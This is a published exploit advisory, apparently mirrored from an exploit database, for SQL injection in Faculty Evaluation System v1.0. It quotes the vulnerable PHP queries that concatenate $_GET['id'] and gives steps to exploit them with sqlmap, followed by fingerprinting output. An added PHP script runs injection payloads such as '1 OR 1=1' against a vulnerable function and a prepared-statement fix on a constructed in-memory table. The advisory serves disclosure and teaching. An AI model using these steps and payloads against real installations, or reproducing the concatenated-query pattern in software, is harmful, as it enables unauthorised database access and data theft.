## https://sploitus.com/exploit?id=PACKETSTORM:173349
# Exploit Title: Faculty Evaluation System v1.0 - SQL Injection  
# Date: 07/2023  
# Exploit Author: Andrey Stoykov  
# Vendor Homepage: https://www.sourcecodester.com/php/14635/faculty-evaluation-system-using-phpmysqli-source-code.html  
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/eval_2.zip  
# Version: 1.0  
# Tested on: Windows Server 2022  
  
  
SQLi #1  
  
File: edit_evaluation  
  
Line #4  
$qry = $conn->query("SELECT * FROM ratings where id = ".$_GET['id'])->fetch_array();  
[...]  
  
  
SQLi #2  
  
File: view_faculty.php  
  
Line #4  
  
// Reached by appending an "id" parameter to the "page=view_faculty" request, e.g. &id=1; the integer is concatenated unescaped below  
[...]  
$qry = $conn->query("SELECT *,concat(firstname,' ',lastname) as name FROM faculty_list where id = ".$_GET['id'])->fetch_array();  
[...]  
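Added example (not code from the advisory or from the Faculty Evaluation System): both snippets above build the WHERE clause by string-concatenating $_GET['id'], so any SQL appended to the parameter is executed. The script below reproduces that pattern next to a hardened version using a prepared statement. It assumes an in-memory SQLite database via PDO with a constructed faculty_list table so it runs offline; the real application uses mysqli against MySQL, where MySQL's concat(firstname,' ',lastname) is written with SQLite's || operator here, but the injection and the fix behave the same.

```php
<?php
// Added example, not part of the advisory or the vulnerable application.
// Constructed data: a tiny faculty_list table in an in-memory SQLite DB (PDO),
// standing in for the MySQL table the application queries via mysqli.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE faculty_list (id INTEGER PRIMARY KEY, firstname TEXT, lastname TEXT)");
$db->exec("INSERT INTO faculty_list VALUES (1,'Ada','Lovelace'),(2,'Alan','Turing'),(3,'Grace','Hopper')");

// Vulnerable: the same pattern as view_faculty.php / edit_evaluation, the raw
// request parameter is pasted into the SQL text (SQLite '||' replaces MySQL concat()).
function vulnerable(PDO $db, string $id): array
{
    $sql = "SELECT *, firstname || ' ' || lastname AS name FROM faculty_list WHERE id = " . $id;
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened: the value is sent as a bound parameter, so it can never become SQL.
// Defence in depth: "id" is an integer by contract, so anything else is rejected outright.
function hardened(PDO $db, string $id): array
{
    if (!preg_match('/^\d+$/', $id)) {
        return [];
    }
    $stmt = $db->prepare("SELECT *, firstname || ' ' || lastname AS name FROM faculty_list WHERE id = :id");
    $stmt->bindValue(':id', (int) $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed payloads, in the form they would arrive in the "id" query parameter.
$payloads = [
    '1',          // legitimate request: one row either way
    '1 AND 1=2',  // boolean-based probe: vulnerable version returns nothing,
    '1 AND 1=1',  //   ... while this twin returns the row again (confirms injection)
    '1 OR 1=1',   // vulnerable version returns every faculty row
];

foreach ($payloads as $p) {
    printf(
        "id=%-10s  vulnerable: %d row(s)   hardened: %d row(s)\n",
        $p,
        count(vulnerable($db, $p)),
        count(hardened($db, $p))
    );
}
```

The differing row counts for the "1 AND 1=1" / "1 AND 1=2" pair are exactly what sqlmap's boolean-based checks look for, and "1 OR 1=1" is why the unauthenticated-looking data dump succeeds. In the application's own mysqli stack the equivalent fix is `$conn->prepare("SELECT * FROM ratings WHERE id = ?")` followed by `bind_param('i', $id)` and `execute()`; the integer check before the query is a second layer, not a substitute for the prepared statement.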
  
  
Steps to Exploit:  
  
1. Log in to the application (both injection points sit behind authentication)  
2. Browse to the following URI: "http://host/eval/index.php?page=view_faculty&id=1"  
3. Capture the request in an intercepting proxy and save it, session cookie included, to a file (test.txt below)  
4. Run sqlmap against the saved request; the `-r` option replays it with the authenticated session  
  
  
sqlmap -r test.txt --threads 1 --dbms=mysql --fingerprint  
  
[...]  
[INFO] testing MySQL  
[INFO] confirming MySQL  
[INFO] the back-end DBMS is MySQL  
[INFO] actively fingerprinting MySQL  
[INFO] executing MySQL comment injection fingerprint  
back-end DBMS: active fingerprint: MySQL >= 5.7  
comment injection fingerprint: MySQL 5.6.49  
fork fingerprint: MariaDB  
[...]